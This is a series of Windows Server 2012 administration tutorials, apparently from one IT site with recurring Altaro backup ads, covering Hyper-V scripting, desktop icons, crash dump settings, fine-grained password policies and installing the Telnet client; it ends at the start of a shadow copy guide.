
Free Webinar: Scripting & Automation in Hyper-V without System Center Virtual Machine Manager (SCVMM)

System Center Virtual Machine Manager (SCVMM) provides some great automation benefits for those organizations that can afford its hefty price tag. However, if SCVMM isn't a cost-effective solution for your business, what are you to do? While VMM certainly makes automation much easier, you can still achieve a good level of automation with PowerShell and the applicable PowerShell modules for Hyper-V, clustering, storage, and more.
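As a small taste of what plain PowerShell can do without VMM, the sketch below creates and starts a new virtual machine using the built-in Hyper-V module on Windows Server 2012 R2. The VM name, paths and virtual switch are placeholders you would adapt to your own environment:

# Create a Generation 2 VM with a new 60 GB VHDX, attached to an existing virtual switch
New-VM -Name "WebSrv01" -MemoryStartupBytes 2GB -Generation 2 `
       -NewVHDPath "D:\VMs\WebSrv01.vhdx" -NewVHDSizeBytes 60GB `
       -SwitchName "External-vSwitch"

# Give the VM two virtual processors and power it on
Set-VMProcessor -VMName "WebSrv01" -Count 2
Start-VM -Name "WebSrv01"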

Click and Download Your Free Hyper-V or VMware backup solution Now!

Are you looking to get to grips with automation and scripting?

Join Thomas Maurer, Microsoft Datacenter and Cloud Management MVP, who will use this webinar to show you how to achieve automation in your Hyper-V environments, even if you don’t have SCVMM.

Remember: any task you have to do more than once should be automated. Bring some sanity to your virtual environment by adding some scripting and automation know-how to your toolbox.

Note: While the Webinar date has passed, you can still access the presentation and download all resources for free. Click below to access it:

Access the webinar recording and resources here:

hyper-v-altaro-free-webinar-scripting-automation-hyper-v-without-scvmm-1

About the presenter:

Thomas Maurer

Thomas Maurer works as a Cloud Architect at itnetx gmbh, a consulting and engineering company located in Bern, Switzerland, which has been awarded "Microsoft Datacenter Partner of the Year" by Microsoft for the past three years (2011, 2012, 2013). Thomas is focused on Microsoft technologies, especially Microsoft cloud solutions based on Microsoft System Center, Microsoft Virtualization and Microsoft Azure. This includes Microsoft Hyper-V, Windows Server, storage, networking and Azure Pack, as well as Service Management Automation.

About the host:

Andrew Syrewicze

Andy is a Technical Evangelist for Altaro Software, providing technical marketing and pre-sales expertise. Prior to that, Andy spent 12+ years providing technology solutions across several industry verticals, including education, Fortune 500 manufacturing, healthcare and professional services, working for MSPs and internal IT departments. During that time he became an expert in VMware, Linux and network security, but his main focus over the last 7 years has been virtualization, cloud services and the Microsoft server stack, with an emphasis on Hyper-V.


How to Install Desktop Icons (Computer, User’s Files, Network, Control Panel) on Windows 2012 Server. Bring Back The Traditional Windows (7,8) Desktop Icons!

One of the first things IT administrators and IT managers notice after a fresh installation of Windows 2012 Server is that there are no desktop icons apart from the Recycle Bin. Desktop icons such as Computer, User’s Files, Network & Control Panel are not available by default. These icons are normally enabled through the Personalize menu, which appears when right-clicking an empty area of the desktop; however, this menu option is not available by default either.

windows-server-2012-display-desktop-icons-computer-network-user-files-1
Figure 1. Personalize Menu is not available by default on Windows 2012 Server

To bring back the Desktop icons, administrators must first install the Desktop Experience feature on Windows 2012 Server.

Running Windows 2012 Server in a virtual environment? Get an award-winning backup solution for Free!! Download Now!

Note: Once the Desktop Experience Feature is installed, the server will require a restart.
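If you prefer the command line over the GUI steps that follow, the Desktop Experience feature can also be installed from an elevated PowerShell session. This is a minimal sketch; the -Restart switch reboots the server automatically once the feature is installed, so omit it if you prefer to restart manually:

PS C:\> Install-WindowsFeature Desktop-Experience -Restart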

To do so, click on the Server Manager icon on the taskbar:

windows-server-2012-display-desktop-icons-computer-network-user-files-2

Figure 2. Server Manager icon on Windows 2012 Server taskbar

 Now select Add Roles and Features:

windows-server-2012-display-desktop-icons-computer-network-user-files-3

Figure 3. Selecting Add roles and features in Windows 2012 Server

 

Now, click Next on the Before you Begin page and at the Installation Type page select Role-based or feature-based installation. Next, select your server from the server pool and click Next:

windows-server-2012-display-desktop-icons-computer-network-user-files-4

Figure 4. Selecting our destination server

At the next window, click on Features located at the left side, do not select anything from the Server Roles which is displayed by default. Under Features, scroll down to User Interfaces and Infrastructure and click to expand it. Now tick Desktop Experience:

windows-server-2012-display-desktop-icons-computer-network-user-files-5

Figure 5. Selecting Desktop Experience under User Interfaces and Infrastructure

When Desktop Experience is selected, a pop up window will ask us to confirm the installation of a few additional services or features required. At this point, simply click on Add Features. Now click on Next and then the Install button.

This will install all necessary server components and add-ons:

windows-server-2012-display-desktop-icons-computer-network-user-files-6

Figure 6. Installation of server components and add-ons - Windows 2012 Server

Once complete, the server will require a restart. After the server restart, we can right-click in an empty area on our desktop and we’ll see the Personalize menu. Select it and then click on Change desktop icons from the next window:

windows-server-2012-display-desktop-icons-computer-network-user-files-7

Figure 7. Selecting Change desktop icons - Windows 2012 Server

Now simply select the desktop icons required to be displayed and click on OK:

windows-server-2012-display-desktop-icons-computer-network-user-files-8

Figure 8. Select Desktop icons to be displayed on Windows 2012 Server Desktop

Free Award-Winning Backup solution for VMware and Hyper-V virtualization environments. Click here!

This article showed how to enable Desktop Icons (Computer, User’s Files, Network, Control Panel) on Windows 2012 Server. We explained this using a step-by-step process and included all necessary screenshots to ensure a quick and trouble-free installation. For more Windows 2012 Server tutorials, visit our Windows Server Section.


Easy, Fast & Reliable Hyper-V & VMware Backup with Altaro's Free Backup Solution

windows-hyper-v-free-backup-1a
As more companies around the world adopt virtualization technology to increase efficiency and productivity, Microsoft’s Hyper-V virtualization platform is continuously gaining ground in the global virtualization market, as is the need for IT departments to provide rock-solid backup solutions for their Hyper-V virtualized environment.

History has shown that backup procedures have always been a major pitfall for most IT departments and companies. With virtualized environments, the need for a backup solution is more important than ever, especially when we consider that physical servers now host multiple virtual servers.

While creating a backup plan and verifying backups can become an extremely complicated and time-consuming process, Altaro has managed to deliver a backup solution that simplifies the backup process of the virtualized environment and ensures the data integrity of servers. Furthermore, Altaro’s backup solution is complemented by a simple recovery procedure, guaranteeing quick and easy recovery from the failure of any virtual machine or hypervisor host.

What’s even better is that Altaro’s Hyper-V & VMware backup solution is completely free for a limited number of virtual servers!

Download your Free Hyper-V & VMware Altaro Backup Solution Now - Limited Offer!

Altaro Hyper-V & VMware Backup is a feature-rich application that allows users to back up and restore VMs with literally just a few clicks. The user interface of Altaro VM Backup is easy to use, with all the necessary features to make the Hyper-V or VMware backup & restore process an easy and simple task.

Main Features Of Altaro VM Backup

  • User-friendly, easy-to-use admin console.
  • Supports Microsoft Windows Server 2012 R2, 2012, 2008 R2, Hyper-V & ESX/ESXi server core.
  • Backup of virtual machines on a schedule.
  • Restore single or multiple virtual machines to a different Hyper-V/VMware host or the same host.
  • Rename virtual machines while restoring them to the same or a different host.
  • Backup of Linux VMs without shutting down the machine.
  • Secured backups with AES encryption.
  • Reduced backup file size with powerful compression.
  • Central Altaro Hyper-V backup management for multiple Hyper-V hosts.
  • File-level restore allows you to mount backed-up VHDs and restore individual files without restoring the whole virtual machine.
  • Business continuity with offsite backup and WAN acceleration.
  • Backup of Exchange Server VMs (supports Exchange 2007, 2010, 2013) with Exchange item-level restore options.
  • Supports backup of Hyper-V Cluster Shared Volumes for larger deployments.
  • Support for Microsoft SQL database VM backup.
  • Free for up to two virtual machines.
  • Extremely low pricing per host (not per socket) provides unbeatable value.

It is evident that Altaro Hyper-V Backup provides a plethora of features that make it a viable solution for companies of any size.

Altaro Hyper-V  Backup Installation Requirements

Installing the Altaro Hyper-V Backup application is no different from installing any other Windows application; it is very easy.
It is important to note that Altaro Hyper-V Backup must be installed on the Hyper-V host machine, not on a guest machine. Altaro Hyper-V supports the following host server editions:

  • Windows 2008 R2 (all editions)
  • Windows Hyper-V Server 2008 R2 (core installation)
  • Windows Server 2012 (all editions)
  • Windows Hyper-V Server 2012 (core installation)
  • Windows Server 2012 R2 (all editions)
  • Windows Hyper-V Server 2012 R2 (core installation)

Minimum system requirements of Altaro Hyper-V Backup are:

  • 350 MB Memory
  • 1 GB free Hard Disk space for Altaro Hyper-V Backup Program and Settings files
  • .NET Framework 3.5 on Windows Server 2008 R2
  • .NET Framework 4.0 on Windows Server 2012

Following is a list of supported backup destinations. This is where you would save the backup of your Hyper-V virtual machines:

  • USB External Drives
  • eSata External Drives
  • USB Flash Drives
  • Fileserver Network Shares using UNC Paths
  • NAS devices (Network Attached Storage) using UNC Paths
  • RDX Cartridges
  • PC Internal Hard Drives (recommended only for evaluation purposes)

Grab a Free Copy of VM Altaro Backup Solution Now!

Installing Altaro Hyper-V Backup Software

The first step is to grab a fresh copy of Altaro’s Hyper-V backup application by downloading it from Altaro’s website.
Run the installation file. We will receive the application’s welcome screen. Click Next to continue through the next windows until the installation is finally complete.

windows-hyper-v-free-backup-1
Figure 1. Installation Welcome Screen

After a few moments, the installation completes. At this point, tick the Launch Management Console option and click Finish:
 

windows-hyper-v-free-backup-2 Figure 2. Altaro Hyper-V Installation Complete

At this point, Altaro Hyper-V Backup has been successfully installed on our Hyper-V server and is ready to run.

Alternatively, Administrators can also install the Altaro Hyper-V Backup application on a workstation or different server, connect remotely to the Hyper-V server and perform all necessary configuration and backup tasks from there.

We found the ‘remote management’ capability extremely handy and proceeded to try it out on our Windows 7 workstation.
It’s worth noting that it makes no difference whether you run Altaro’s Hyper-V Backup directly on the Hyper-V host or remotely, as we did.

After installing the application on our Windows 7 workstation, we ran it and entered the necessary details to connect with the Hyper-V host:

windows-hyper-v-free-backup-3
Figure 3. Connecting to the Hyper-V Agent Remotely

Users running the application directly on the Hyper-V host would select the ‘This Machine’ option from above.

Once connected to the Hyper-V agent, the Altaro Hyper-V Backup main screen appears:


windows-hyper-v-free-backup-4 Figure 4. Altaro Hyper-V Backup - Main Screen (click to enlarge)

Altaro’s Hyper-V Backup solution offers an extensive number of options. When running the application for the first time, it provides a quick 3-step guide to help you quickly set up a few mandatory options and begin performing your first Hyper-V backup in just a couple of minutes!

In our upcoming articles, we’ll be taking a closer look at how Altaro’s Hyper-V Backup application manages to make life easy for virtualization administrators, with its easy backup and restore procedures.

Summary

This article introduced Altaro’s Hyper-V Backup application – a complete backup and restore solution that manages to take away the complexity of managing backup and restore procedures for a Hyper-V virtualization environment of any size. Altaro’s Hyper-V Backup solution is completely FREE for a limited number of virtual machines!


Troubleshooting Windows Server 2012 R2 Crashes. Analysis of Dump Files & Options. Forcing System Server Crash (Physical/Virtual)

windows-2012-troubleshooing-server-crashes-memory-dumps-debug-001a
There are umpteen reasons why your Windows Server 2012 R2 may decide to present you with a Blue Screen of Death (BSOD), or stop screen. As virtual machines become more prominent in enterprise environments, the same problems that plagued physical servers earlier are now increasingly being observed in crashes of virtual machines as well.

Microsoft designs and configures Windows systems to capture information about the state of the operating system when a total system failure occurs, as opposed to the failure of an individual application. You can see and analyze the captured information in the dump files, the settings of which you can configure using the System tool in the Control Panel. By default, the BSOD provides minimal information about the possible cause of the system crash, and this may suffice in most circumstances to help identify the cause of the crash.

However, some crashes may require a deeper level of information than what the stop screen provides – for example, when your server simply hangs and becomes unresponsive. In that case, you may still be able to see the desktop, but moving the mouse or pressing keys on the keyboard produces no response. To resolve the issue, you need a memory dump. This is basically a binary file that contains a portion of the server's memory just before it crashed. Windows Server 2012 R2 provides five options for configuring memory dumps.

SafeGuard your Hyper-V & VMware servers from unrecoverable crashes with a reliable FREE Backup – Altaro’s VM Backup. Download Now!

Different Types Of Memory Dump Files

1. Automatic Memory Dump

The Automatic memory dump is the default setting that Windows Server 2012 R2 starts off with. This is not really a new dump type; it is essentially a Kernel memory dump, but it allows the SMSS process to keep the system-managed page file smaller than the size of the installed RAM, thereby reducing the size of the page file on disk.

2. Complete Memory Dump

A complete memory dump is a record of the complete contents of the physical memory (RAM) in the computer at the time of the crash. Therefore, it needs a page file that is at least as large as the amount of RAM present plus 1 MB. A complete memory dump will usually contain data from the processes that were running when the dump was collected. A subsequent crash will overwrite the previous contents of the dump file.

3. Kernel Memory Dump

The kernel memory dump records only the read/write pages associated with kernel mode in physical memory at the time of the crash. The non-paged memory saved in the kernel memory dump contains a list of running processes, the state of the current thread and the list of loaded drivers. The amount of kernel-mode memory allocated by Windows and by the drivers present on the system defines the size of the kernel memory dump.

4. Small Memory Dump

A small memory dump or a MiniDump is a record of the stop code, parameters, list of loaded device drivers, information about the current process and thread, and includes the kernel stack for the thread that caused the crash.

5. No Memory Dump

Sometimes you may not want a memory dump when the server crashes.

Configuring Dump File Settings

Windows Server 2012 R2 uses the Automatic memory dump by default, but you can configure any of the dump types. To start the configuration, log in as a local administrator and click on Control Panel in the Start menu:

windows-2012-troubleshooing-server-crashes-memory-dumps-debug-001 

Figure 1. Invoking the Windows Server Control Panel


From the Control Panel, click on System and Security icon. Next, click on System:

windows-2012-troubleshooing-server-crashes-memory-dumps-debug-002 

Figure 2. System and Security

In the System Properties that opens up, click on the Advanced tab as shown below:

windows-2012-troubleshooing-server-crashes-memory-dumps-debug-003 

Figure 3. System Properties – Advanced Tab

In the Advanced System Properties, look for and click on Settings under the Startup and Recovery section:

windows-2012-troubleshooing-server-crashes-memory-dumps-debug-004 

Figure 4. Startup and Recovery dialog

 

 windows-2012-troubleshooing-server-crashes-memory-dumps-debug-005

Figure 5. The five types of debugging information (memory dumps) available

Here, you have the choice to let your server Automatically restart on system failure. Under Write debugging information, you can select one of the five types of memory dumps to be saved in the event of a server crash.

You can also define the name of the dump file the server should create and specify its location. The default location is the system root and the default name of the file is MEMORY.DMP. If you do not want the previous file to be overwritten by a new dump file, remove the tick mark from Overwrite any existing file (visible in figure 4).

When done, you will need to restart the server for the changes to take effect.
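For reference, the Write debugging information selection in this dialog is stored in the registry under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\CrashControl as the CrashDumpEnabled DWORD value. The sketch below, which assumes an elevated PowerShell session, shows how the same setting could be queried and changed from the command line; the value-to-dump-type mapping in the comment reflects the commonly documented values:

# Query the current dump type
Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\CrashControl" -Name CrashDumpEnabled

# Set the dump type (0 = none, 1 = complete, 2 = kernel, 3 = small, 7 = automatic)
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\CrashControl" -Name CrashDumpEnabled -Value 2 -Type DWord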

Manually Generating A Dump File

Although the server will create dump files when it crashes, you do not have to wait indefinitely for a crash to occur. As described in Microsoft’s support pages Generating a System Dump via Keyboard and Forcing a System Crash via Keyboard, you can induce the server to crash with a specific combination of keys. Of the several methods described by Microsoft, we will discuss the method for USB keyboards.

Forcing a System Crash From the Keyboard

Begin with a command prompt that has administrative privileges. To open one, go to the Start menu and click on Command Prompt (Admin):

 windows-2012-troubleshooing-server-crashes-memory-dumps-debug-006

Figure 6. Invoking the Command Prompt with Elevated Privileges

In the command prompt window that opens, type “regedit” and hit Enter:

windows-2012-troubleshooing-server-crashes-memory-dumps-debug-007 

Figure 7. Opening and Editing the Windows Registry

This opens the Registry Editor screen. Now expand all the way to the following section:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\CrashControl

Right-click on CrashControl and create a new DWORD with the name CrashDumpEnabled, which will appear in the right-hand pane. Next, modify its value by right-clicking on CrashDumpEnabled in the right-hand pane and selecting Modify:

windows-2012-troubleshooing-server-crashes-memory-dumps-debug-008

Figure 8. Editing the Registry. Modifying the new registry DWORD CrashDumpEnabled

In the Edit DWORD Value dialog that opens enter Value data as 1 and click on OK:

 windows-2012-troubleshooing-server-crashes-memory-dumps-debug-009

Figure 9. Editing the Value Data of CrashDumpEnabled

The next step is to go to the following registry location:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\kbdhid\Parameters

Right-click on Parameters and create a new DWORD with the name CrashOnCtrlScroll, which will appear in the right pane:

windows-2012-troubleshooing-server-crashes-memory-dumps-debug-010

Figure 10. Editing the Registry. Creating the new Registry DWORD CrashOnCtrlScroll

Now, modify the CrashOnCtrlScroll value by right-clicking on CrashOnCtrlScroll in the right pane and selecting Modify:

windows-2012-troubleshooing-server-crashes-memory-dumps-debug-011 

Figure 11. Modifying the Registry DWORD entry CrashOnCtrlScroll

 In the Edit DWORD Value dialog that opens, enter Value data as 1 and click on OK:

 windows-2012-troubleshooing-server-crashes-memory-dumps-debug-012

Figure 12. Editing the Value data of CrashOnCtrlScroll

Restart the server for the new values to take effect.
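If you prefer scripting these registry changes rather than clicking through Regedit, the following sketch (run from an elevated PowerShell session) creates the same two values described above. Treat it as a convenience equivalent of the manual steps, not an official procedure:

# Ensure a dump will actually be written when the crash is triggered
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\CrashControl" -Name CrashDumpEnabled -Value 1 -Type DWord

# Allow a keyboard-triggered crash on USB keyboards (kbdhid driver)
New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\kbdhid\Parameters" -Name CrashOnCtrlScroll -Value 1 -PropertyType DWord -Force

# Restart so the new values take effect
Restart-Computer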

Next, to crash the server, press the combination of keys:

CTRL + SCROLL LOCK + SCROLL LOCK

Note: Press the SCROLL LOCK key twice while holding down the right CTRL key.

The server will crash and restart, and a new dump file should have been created.

Note: However, as described in the Microsoft support pages referenced above, this method does not always work; for other methods, you can refer to additional Microsoft support pages here.

This article explained why Windows Server dump files are considered important and how we can configure Windows Server 2012 R2 to save crash dump files. We covered the different memory dumps (Automatic, Complete, Kernel, Small and No memory dump) and how to configure the dump settings. More articles on Windows Server 2012 can be found in our Windows Server 2012 Section.


Installation and Configuration of Fine-Grained Password Policy for Windows Server 2012

windows-2012-install-setup-fine-grained-password-policy-01a
Microsoft introduced the Fine-Grained Password Policy for the first time in Windows Server 2008, and the feature has been part of every Windows Server since then. Fine-Grained Password Policies overcome the limitation of having only one password policy for a single domain; for example, they allow us to apply different password and account lockout policies to different users within the same domain.
 
This article discusses the Fine-Grained Password Policy as applicable to Windows Server 2012, and the different ways of configuring this policy. Windows Server 2012 allows two methods of configuring the Fine-Grained Password Policy:

1. Using the Windows PowerShell

2. Using the Active Directory Administrative Center or ADAC

In earlier Windows Server editions, it was possible to configure the Fine-Grained Password Policy only through the command line interface (CLI). However, with Windows Server 2012 a graphical user interface has been added, allowing the configuration of the Fine-Grained Password Policy via the Active Directory Administrative Center. We will discuss both methods.

Before you begin to implement the Fine-Grained Password Policy, you must make sure the domain functional level is Windows Server 2008 or higher. Refer to the relevant Windows 2012 articles on our website, Firewall.cx.

Backup your Windows Server 2012 R2 host using Altaro’s Free Hyper-V & VMware Backup solution. Download Now!

Configuring Fine-Grained Password Policy From Windows PowerShell

Use your administrative credentials to log in to your Windows Server 2012 domain controller. Invoke the PowerShell console by right-clicking on the third icon from the left in the taskbar on the Windows Server desktop and then clicking on Run as Administrator.

windows-2012-install-setup-fine-grained-password-policy-01

Figure 1. Executing Windows PowerShell as Administrator

Clicking on Yes to the UAC confirmation will open up an Administrator: Windows PowerShell console.

Within the PowerShell console, type the following command in order to begin the creation of a new fine grained password policy and press Enter:

C:\Windows\system32> New-ADFineGrainedPasswordPolicy

windows-2012-install-setup-fine-grained-password-policy-02

Figure 2. Creating a new Fine Grained Password Policy via PowerShell

Type a name for the new policy at the Name: prompt and press Enter. In our example, we named our policy FGPP:

windows-2012-install-setup-fine-grained-password-policy-03

Figure 3. Naming our Fine Grained Password Policy

Type a precedence index number at the Precedence: prompt and press Enter. Note that policies that have a lower precedence number have a higher priority over those with higher precedence numbers. We’ve set our new policy with a precedence of 15:
windows-2012-install-setup-fine-grained-password-policy-04

Figure 4. Setting the Precedence index number of our Fine Grained Password Policy

Now the policy is configured, but with all default values. If there is a need to add specific parameters to the policy, you can do so by typing the following at the Windows PowerShell command prompt and pressing Enter:

C:\Windows\system32> New-ADFineGrainedPasswordPolicy -Name FGPP -DisplayName FGPP -Precedence 15 -ComplexityEnabled $true -ReversibleEncryptionEnabled $false -PasswordHistoryCount 20 -MinPasswordLength 10 -MinPasswordAge 3.00:30:00 -MaxPasswordAge 30.00:30:00 -LockoutThreshold 4 -LockoutObservationWindow 0.00:30:00 -LockoutDuration 0.00:45:00

In the above command, replace FGPP with the name of your own password policy.

The parameters used above are largely self-explanatory and map to the password and lockout settings listed below:

Attributes for Password Settings above include:

  • Enforce password history
  • Maximum password age
  • Minimum password age
  • Minimum password length
  • Passwords must meet complexity requirements
  • Store passwords using reversible encryption

Attributes involving account lockout settings include:

  • Account lockout duration
  • Account lockout threshold
  • Reset account lockout after


To apply the policy to a user/group or users/groups, use the following command at the PowerShell command prompt:

C:\Windows\system32> Add-ADFineGrainedPasswordPolicySubject -Identity FGPP -Subjects “Chris_Partsenidis”

To confirm whether the policy has indeed been applied to the groups/users correctly, type the following command at the PowerShell command prompt and press Enter:

C:\Windows\system32> Get-ADFineGrainedPasswordPolicy -Filter { name -like “FGPP” }

Remember, it is necessary to replace FGPP in the above with the name of your password policy. Also replace Chris_Partsenidis with the name of the group or user to whom you want to apply the policy.

The screenshot below shows the execution of the commands and output:

 windows-2012-install-setup-fine-grained-password-policy-05

Figure 5. Applying and verifying a Fine Grained Password Policy to a User or Group

Check the AppliesTo section from the output to verify if the policy is applied to the intended user or group.
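You can also ask Active Directory which fine-grained policy actually wins for a given user. The following command is a quick sanity check; it assumes the Active Directory PowerShell module is available (as it is on a domain controller) and uses our example user:

PS C:\Windows\system32> Get-ADUserResultantPasswordPolicy -Identity Chris_Partsenidis

If the command returns your policy (FGPP in our example), the user is receiving the fine-grained settings rather than the default domain policy; if it returns nothing, the default domain password policy still applies.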

Configuring Fine-Grained Password Policy Using The Active Directory Administrative Center (ADAC)

Use your administrative credentials to login to your Windows Server 2012 domain controller. Invoke the Server Manager Dashboard by left-clicking on the second icon in the taskbar on the Windows Server desktop:

windows-2012-install-setup-fine-grained-password-policy-06

Figure 6. Opening Server Manager Dashboard

In the Server Manager Dashboard, go to the top right hand corner, click on Tools and then click on Active Directory Administrative Center:

windows-2012-install-setup-fine-grained-password-policy-07

Figure 7. Launching Active Directory Administrative Center

Once the Active Directory Administrative Center screen is open, from the left panel select your Active Directory domain (local) and expand it.

In our example, the Active Directory domain is firewall (local). Locate the System container, expand it and click on Password Settings Container:

windows-2012-install-setup-fine-grained-password-policy-08

Figure 8. Locating the Password Settings Container

On the right panel, under Tasks and Password Settings Container, click on New:

windows-2012-install-setup-fine-grained-password-policy-09

Figure 9. Accessing Password Settings Container

Now click on Password Settings, which will open up the Create Password Settings screen. Enter a name for the Fine-Grained Password Policy and a number for its precedence.

For our example, we are using the name FGPP or Firewall Group Password Policy with a precedence index of 15. Also, configure the remainder of the policy settings as required:

windows-2012-install-setup-fine-grained-password-policy-010 
Figure 10. Configuring settings for our FGPP Policy

Once satisfied with the settings, click on Add at the bottom right hand corner. This will open up the Select Users or Groups dialog.

Click on Object Types to select either Users or Groups or both. Click on Locations to select the domain, which in our case is firewall.local.

Under the object names to select, type the name of the group or user on whom you want to apply the password policy. In our example, this is Chris_Partsenidis as shown below:

windows-2012-install-setup-fine-grained-password-policy-011

Figure 11. Selecting the Active Directory object to which the Fine Grained Password Policy will be applied

Click on OK, and you will return to the Create Password Settings screen, which will now have the new name FGPP on top and the name of the user (to whom the policy will apply) at the bottom:

windows-2012-install-setup-fine-grained-password-policy-012

Figure 12. Our Fine Grained Password Policy

Click on OK to complete the process and go back to the Active Directory Administrative Center, which will now show the new Password Settings Container with the name FGPP and the precedence index in the center panel:

windows-2012-install-setup-fine-grained-password-policy-013

Figure 13. Our Fine Grained Password Policy appearing in the Password Settings Container

To modify any parameter, double click on the Password Settings Container in the central panel. Finally, when you are done, close the Active Directory Administrative Center window.

This article covered the installation and configuration of Fine-Grained Password Policies for Windows Server 2012. We explained how Fine-Grained Password Policies can be configured via PowerShell and the Active Directory Administrative Center. Our step-by-step guide shows all the necessary details to ensure a successful installation and configuration. More high-quality articles can be found in our Windows 2012 Section.


How to Install/Enable Telnet Client for Windows Server 2012 via GUI, Command Prompt and PowerShell

windows-2012-install-telnet-client-via-gui-cmd-prompt-powershell-00
IT professionals frequently need connectivity and management tools. The Telnet client is one of the most basic tools for such activities. Using this tool, you can connect to a remote Telnet server and run applications on it. It is also a very useful tool for testing connectivity to remote servers, such as those running SMTP services, web services and so on. In this article we will discuss how to install or enable the Telnet client for Windows Server 2012, using the GUI, the command prompt or PowerShell.

Microsoft operating systems since Windows NT have included the Telnet client as a feature. However, in later operating systems, beginning with Windows Server 2008 and Windows Vista, it is no longer enabled by default. Although you can always use a third-party tool to assist you with remote connections and connectivity troubleshooting, you can enable the Telnet client on your Windows Server 2012 at any time.

Backup your Windows Server 2012 R2 host using Altaro’s Free Hyper-V & VMware Backup solution. Download Now!

Primarily, there are three ways you can install or enable the Telnet client for Windows Server 2012: from the graphical user interface, from the Windows command prompt, or from PowerShell. We will discuss all three methods in this article.

Installing Telnet Client From The GUI

Invoke the Server Manager by clicking on the second icon on the bottom taskbar on the desktop of the Windows Server 2012 R2:

windows-2012-install-telnet-client-via-gui-cmd-prompt-powershell-01

Figure 1. Launching Windows Server Dashboard

On the Dashboard, click on Add Roles and Features, which opens the Add roles and features wizard:

windows-2012-install-telnet-client-via-gui-cmd-prompt-powershell-02 
Figure 2. Selecting Add roles and features on Windows Server 2012

Click on Installation Type and select Role-based or feature-based installation. Click on Next to proceed:

 windows-2012-install-telnet-client-via-gui-cmd-prompt-powershell-03

Figure 3. Selecting Installation Type – Role-based or feature-based installation

On the next screen, you can Select a server from the server pool. We select the server FW-DC1.firewall.local:

windows-2012-install-telnet-client-via-gui-cmd-prompt-powershell-04 
Figure 4. Selecting our server, DC1.firewall.local

Clicking on Next brings you to the Server Roles screen. As there is nothing to be done here, click on Next to continue to the Features screen. Now scroll down under Features until you arrive at the Telnet Client. Click within the box in front of the Telnet Client entry to select it, then click on Next to continue:

 windows-2012-install-telnet-client-via-gui-cmd-prompt-powershell-05

Figure 5. Selecting the Telnet client for installation

The following screen asks you to Confirm Installation Selections. Tick the Restart the destination server automatically if required box and click on Yes to confirm the automatic restart without further notification. Finally, click on Install to start the installation of the Telnet Client:

 windows-2012-install-telnet-client-via-gui-cmd-prompt-powershell-06

Figure 6. Final confirmation and initiation of the Windows Telnet Client installation

Once completed, the Results screen will inform you of the success or failure of the process:

 windows-2012-install-telnet-client-via-gui-cmd-prompt-powershell-07

Figure 7. Successful installation of Windows Server Telnet Client

Click on Close to end the installation and return to the Server Manager screen.

Running a Windows Hyper-V or VMware server? Hyper-V & VMware backup made easy with Altaro’s Free VM Backup solution. Download Now!

Installing Telnet Client From The Command Prompt

You need to invoke the Command Prompt window as an Administrator. To do this, right-click on the Windows Start icon located in the lower left corner of the desktop taskbar, click on Command Prompt (Admin) and then click on Yes to the User Account Control query that opens up.

 windows-2012-install-telnet-client-via-gui-cmd-prompt-powershell-08

Figure 8. Launching a Command Prompt with Administrator privileges

 Once the Administrator: Command Prompt window opens, type the following command and press Enter:

C:\Windows\system32>dism /online /Enable-Feature /FeatureName:TelnetClient

 windows-2012-install-telnet-client-via-gui-cmd-prompt-powershell-09

Figure 9. Installing Telnet Client via Elevated Command Prompt

The command prompt will provide a real-time progress update and inform you once the Telnet Client has been successfully installed.

To exit the command prompt window, simply click on the X button (top right corner) or type Exit and press Enter.

Note: It is possible to also install Windows Telnet Client on Windows 8 & Windows 8.1 using the same commands at the Command Line Prompt or PowerShell interface.

Installing Telnet Client From PowerShell

You need to invoke PowerShell with elevated permissions, i.e., run it as Administrator. To do this, right-click on the third icon from the left on the bottom taskbar of the Windows Server 2012 R2 desktop:

 windows-2012-install-telnet-client-via-gui-cmd-prompt-powershell-010

Figure 10. Running PowerShell with Administrator privileges

Click on Run as Administrator and click on Yes to the User Account Control query that opens up.

Within the PowerShell window, type the following two commands, pressing Enter after each one:

PS C:\Windows\system32> Import-Module servermanager
PS C:\Windows\system32> Add-WindowsFeature telnet-client

 windows-2012-install-telnet-client-via-gui-cmd-prompt-powershell-011

Figure 11. Installing Telnet Client via PowerShell On Windows 2012 R2 Server

Windows PowerShell will commence installing the Telnet Client and will inform you whether the Telnet Client has been successfully installed and whether the server needs a restart.

Type Exit and press Enter to close the Windows PowerShell window.
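Once the client is installed, you can quickly verify that it works by opening a connection to a remote service. As a hypothetical example (the host name below is a placeholder), the following command attempts to reach an SMTP server on TCP port 25; a banner from the mail server indicates the port is reachable, while a connection error points to a network or firewall issue:

C:\> telnet mail.example.com 25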

This article showed how to install the Telnet Client on Windows Server 2012 R2 using the Windows GUI interface, an elevated command prompt and Windows PowerShell. For more exciting articles on Windows Server 2012 R2, visit our Windows 2012 Section.


How to Enable & Configure Shadow Copy for Shared Folders on Windows Server 2012 R2

When you shadow copy a disk volume, you are generating a point-in-time snapshot of the folders and files within that volume. The Windows 2012 R2 shadow copy feature allows taking snapshots at set intervals, so that users can revert and restore their folders and files to a previous version.

The shadow copy feature is a much faster solution than a traditional backup. We should keep in mind, however, that shadow copy is not meant as a replacement for the traditional backup process: it never copies all the files and folders, but only keeps track of the changes made to them. Typically, shadow copies are useful in scenarios where one needs to restore an earlier version of files or folders.

To configure a shadow copy of a shared folder in Windows Server 2012, you first have to enable the shadow copy feature on the disk volume containing the shared folder. The shadow copy process works only at the volume level and not on individual files or directories. Additionally, it works only on NTFS volumes and not on FAT volumes. After generating a snapshot of the data, the server keeps track of the changes occurring to the data.

Typically, the server stores the changes on the same volume as the original, but you can change the destination. Additionally, you can define the disk space allocated to shadow copies. As the allocated disk space fills up, the server deletes the oldest shadow copy snapshot, thereby making room for newer shadow copies. Once the server has deleted a shadow copy snapshot, you cannot retrieve it. Windows Server 2012 R2 can keep a maximum of 64 shadow copies per volume.

Running a Windows Hyper-V or VMware Server? Hyper-V & VMware Backup made easy with Altaro’s Free VM Backup Solution. Download Now!

Install File & Storage Services

The shadow copy feature requires prior installation of all the File and Storage Services. To install or verify the installation of all the File and Storage Services, log on to the server as a local administrator, go to the Server Manager Dashboard and click on Add Roles and Features.

windows-2012-shadow-copy-setup-generate-file-folder-01

Figure 1. Server Manager Dashboard

